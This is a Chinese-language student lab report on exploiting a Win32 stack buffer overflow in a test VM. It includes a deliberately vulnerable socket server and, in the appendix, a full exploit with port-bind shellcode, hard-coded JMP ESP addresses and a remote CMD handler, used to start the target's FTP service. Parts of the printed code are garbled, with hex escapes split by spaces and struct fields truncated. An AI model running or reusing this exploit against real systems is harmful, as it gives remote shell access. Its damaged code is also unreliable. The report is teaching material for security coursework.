网络实验报告一、实验目的及要求1、目的了解和掌握Win32平台缓冲区溢出原理;学会使用Win32平台Shellcode技术。
2、内容及要求以windows 2000 server虚拟机为测试对象,修改server.cpp和exploit.c,利用shellcode port bind给出的shellcode,远程获得CMD,并启动目标机器的ftp服务。
二、仪器用具计算机(分别装有windows server 2000和windows 7操作系统),本实验使用的是虚拟机Wmware8.0在同一台电脑上面安装两个操作系统。
三、实验方法与步骤在实验开始前,首先编写可能产生缓冲区溢出的程序(server.cpp)和测试程序(exploit.c)。
在server.cpp中能够产生缓冲区溢出的程序片段如下:void overflow(char * s,int size){char s1[50];printf("receive %d bytes",size);s[size]=0;strcpy(s1,s);}这两个程序的完整代码见附件。
由于本实验是在虚拟机环境下测试的,所以在开始实验前,分别记下两个系统的IP地址:运行server程序的系统IP地址为:192.168.209.131运行exploit程序的系统IP地址为:192.168.209.1实验的过程如下:1.在windows2000系统下分别编译server.cpp和exploit.c程序,详细过程如下:C:\test>cl server.cppC:\test>cl exploit.c编译完成后分别产生exploit.exe、exploit.obj、server.exe、server.obj截图如下图1所示:图 12.在windows2000系统中运行服务程序:server.cppC:\test>server.exe截图如下图2所示:图 23.将编译好的exploit程序拷贝到windows 7系统中来测试4.在windows 7系统中运行exploit.exe程序,如下D:\client\exploit.exe 192.168.209.131 8888截图如下图3所示:图3这样就可以获得目标主机的CMD了,接下来的任务是开启目标主机的FTP服务。
5.紧接着上面的步骤,在获得CMD的情况下,运行如下的命令来开启目标机器的FTP服务C:\test>net start “ftp publishing service”截图如下图4所示:图4四、实验结果及讨论从上面的截图可以看出,实验通过exploit.exe程序顺利的获取了目标机器的CMD并启动FTP服务。
由于不同的系统下JMP跳转指令的地址不相同,因此在windows xp与windows 2000程序的差别在于#define JUMPESP的定义。
windows2000下可以采用如下的定义:#define JUMPESP "\x12\x45\xfa\x7f"windows xp sp2可以采用下面的定义:#define JUMPESP "\xed\x1e\x96\x7c"由于程序是使用VC6编译器来编译的,它保持4字节栈对齐,因此服务程序server.cpp并不需要任何改动。
五、附录exploit.c程序代码#include <stdio.h>#include <stdlib.h>#include <windows.h>#pragma comment (lib,"ws2_32")// jmp esp address of chinese version#define JUMPESP "\x12\x45\xfa\x7f" char shellcode[] ="\xeb\x10\x5b\x4b\x33\xc9\x66\xb9\x23\ x01\x80\x34\x0b\xf8\xe2\xfa""\xeb\x05\xe8\xeb\xff\xff\xff\x11\x01\xf8\ xf8\xf8\xa7\x9c\x59\xc8""\xf8\xf8\xf8\x73\xb8\xf4\x73\x88\xe4\x5 5\x73\x90\xf0\x73\x0f\x92""\xfb\xa1\x10\x61\xf8\xf8\xf8\x1a\x01\x9 0\xcb\xca\xf8\xf8\x90\x8f""\x8b\xca\xa7\xac\x07\xee\x73\x10\x92\x fd\xa1\x10\x78\xf8\xf8\xf8""\x1a\x01\x79\x14\x68\xf9\xf8\xf8\xac\x9 0\xf9\xf9\xf8\xf8\x07\xae""\xf4\xa8\xa8\xa8\xa8\x92\xf9\x92\xfa\x0 7\xae\xe8\x73\x20\xcb\x38""\xa8\xa8\x90\xfa\xf8\xe9\xa4\x73\x34\x 92\xe8\xa9\xab\x07\xae\xec" "\x92\xf9\xab\x07\xae\xe0\xa8\xa8\xab\x 07\xae\xe4\x73\x20\x90\x9b""\x95\x9c\xf8\x75\xec\xdc\x7b\x14\xac\x 73\x04\x92\xec\xa1\xcb\x38""\x71\xfc\x77\x1a\x03\x3e\xbf\xe8\xbc\x 06\xbf\xc4\x06\xbf\xc5\x71""\xa7\xb0\x71\xa7\xb4\x71\xa7\xa8\x75\x bf\xe8\xaf\xa8\xa9\xa9\xa9""\x92\xf9\xa9\xa9\xaa\xa9\x07\xae\xfc\xc b\x38\xb0\xa8\x07\xae\xf0""\xa9\xae\x73\x8d\xc4\x73\x8c\xd6\x80\x fb\x0d\xae\x73\x8e\xd8\xfb""\x0d\xcb\x31\xb1\xb9\x55\xfb\x3d\xcb\x 23\xf7\x46\xe8\xc2\x2e\x8c""\xf0\x39\x33\xff\xfb\x22\xb8\x13\x09\xc 3\xe7\x8d\x1f\xa6\x73\xa6""\xdc\xfb\x25\x9e\x73\xf4\xb3\x73\xa6\x e4\xfb\x25\x73\xfc\x73\xfb""\x3d\x53\xa6\xa1\x3b\x10\xfa\x07\x07\x 07\xca\x8c\x69\xf4\x31\x44""\x5e\x93\x77\x0a\xe0\x99\xc5\x92\x4c\x 78\xd5\xca\x80\x26\x9c\xe8""\x5f\x25\xf4\x67\x2b\xb3\x49\xe6\x6f\xf 9";// ripped from isnoint Make_Connection(char *address,int port,int timeout){struct sockaddr_in target;SOCKET s;int i;DWORD bf;fd_set wd;struct timeval tv;s = socket(AF_INET,SOCK_STREAM,0);if(s<0)return -1;target.sin_family = AF_INET;target.sin_addr.s_addr = inet_addr(address);if(target.sin_addr.s_addr==0){closesocket(s);return -2;}target.sin_port = htons(port);bf = 1;ioctlsocket(s,FIONBIO,&bf);_sec = timeout;_usec = 0;FD_ZERO(&wd);FD_SET(s,&wd);connect(s,(struct sockaddr *)&target,sizeof(target));if((i=select(s+1,0,&wd,0,&tv))==(-1)){closesocket(s);return -3;}if(i==0){closesocket(s);return -4;}i = sizeof(int);getsockopt(s,SOL_SOCKET,SO_ERROR ,(char *)&bf,&i);if((bf!=0)||(i!=sizeof(int))){closesocket(s);return -5;}ioctlsocket(s,FIONBIO,&bf);return s;}/* ripped from TESO code and modifed by ey4s for win32 */void shell (int sock){int l;char buf[512];struct timeval time;unsigned long ul[2];_sec = 1;_usec = 0;while (1){ul[0] = 1;ul[1] = sock;l = select (0, (fd_set *)&ul, NULL, NULL, &time);if(l==1){l = recv (sock, buf, sizeof (buf), 0);if (l <= 0){printf ("[-] Connection closed.\n");return;}l = write (1, buf, l);if (l <= 0){printf ("[-] Connection closed.\n");return;}}else{l = read (0, buf, sizeof (buf));if (l <= 0){printf("[-] Connection closed.\n");return;}l = send(sock, buf, l, 0);if (l <= 0){printf("[-] Connection closed.\n");return;}}}}int main(int argc, char *argv[]){SOCKET c,s;WSADATA WSAData;char Buff[1024];if (argc < 3){fprintf(stderr, "Usage: %s remote_addr remote_port", argv[0]);exit(1);}if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0){printf("[-] WSAStartup failed.\n");WSACleanup();exit(1);}memset(Buff, 0x90, sizeof(Buff)-1);strcpy(Buff+56, JUMPESP);strcpy(Buff+60, shellcode);s = Make_Connection(argv[1], atoi(argv[2]), 10);if(s<0){printf("[-] connect err.\n");exit(1);}send(s,Buff,sizeof(Buff),0);Sleep(1000);c = Make_Connection(argv[1], 4444,10);shell(c);WSACleanup();return 1;}server.cpp程序代码#include <winsock2.h>#include <stdio.h>#pragma comment(lib,"ws2_32")char Buff[2048];void overflow(char * s,int size){char s1[50];printf("receive %d bytes",size);s[size]=0;strcpy(s1,s);}int main(){WSADATA wsa;SOCKET listenFD;int ret;char asd[2048];WSAStartup(MAKEWORD(2,2),&wsa);listenFD = WSASocket(2,1,0,0,0,0);struct sockaddr_in server;server.sin_family = AF_INET;server.sin_port = htons(8888);server.sin_addr.s_addr = INADDR_ANY;ret=bind(listenFD,(sockaddr*)&server,sizeof(server));ret=listen(listenFD,2);int iAddrSize = sizeof(server);SOCKETclientFD=accept(listenFD,(sockaddr*)&server,&iAddrSize);unsigned long lBytesRead;while(1) {lBytesRead=recv(clientFD,Buff,2048,0);if(lBytesRead<=0) break;printf("\nfd = %x\n", clientFD);overflow(Buff,lBytesRead);ret=send(clientFD,Buff,lBytesRead,0);if(ret<=0) break;}WSACleanup();return 0;}。